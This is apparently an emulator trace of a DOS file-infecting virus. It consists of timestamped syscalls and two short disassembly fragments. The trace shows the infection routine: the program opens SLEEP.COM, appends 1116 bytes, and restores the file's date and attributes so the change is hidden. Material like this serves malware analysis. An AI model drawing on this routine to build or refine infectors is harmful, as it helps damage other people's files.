2018-12-25T12:30:49.700325847Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.71109785Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.712958978Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.722190352Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.734142767Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:49.737512272Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.7450553Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.75280408Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.755543261Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.766751946Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.769057206Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.777381211Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.781028181Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.783049181Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.787481874Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.789602655Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.799997058Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.802663983Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.811500373Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.822752708Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:49.826540507Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:49.831880161Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.914948438Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.930696274Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.934773734Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.93582193Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.942766619Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.959022481Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.986225711Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:49.988597338Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:50.004370252Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:50.00645151Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:50.013360834Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:50.017029202Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:50.019927399Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:50.022806638Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:50.026001026Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:50.03551142Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:50.037291556Z 62 PC: 12d05 | Close file
2018-12-25T12:30:50.062267106Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:50.07215877Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:50.075089496Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:50.08288825Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:50.089598255Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:50.091997232Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:50.103573944Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:50.105575543Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:50.112313459Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:50.115589844Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:50.117499752Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:50.119319881Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:50.121005922Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:50.126736638Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:50.127826774Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:50.132958244Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:50.143678047Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:50.146582212Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:50.15410275Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:50.160984804Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:50.16340695Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:50.174541808Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:50.177245499Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:50.183997618Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:50.187015373Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:50.190965086Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:50.193793686Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:50.195879443Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:50.205814706Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:50.207576225Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:50.214958881Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:50.225482061Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:50.228269683Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:50.233044861Z 59 PC: 12d9a | Change current directory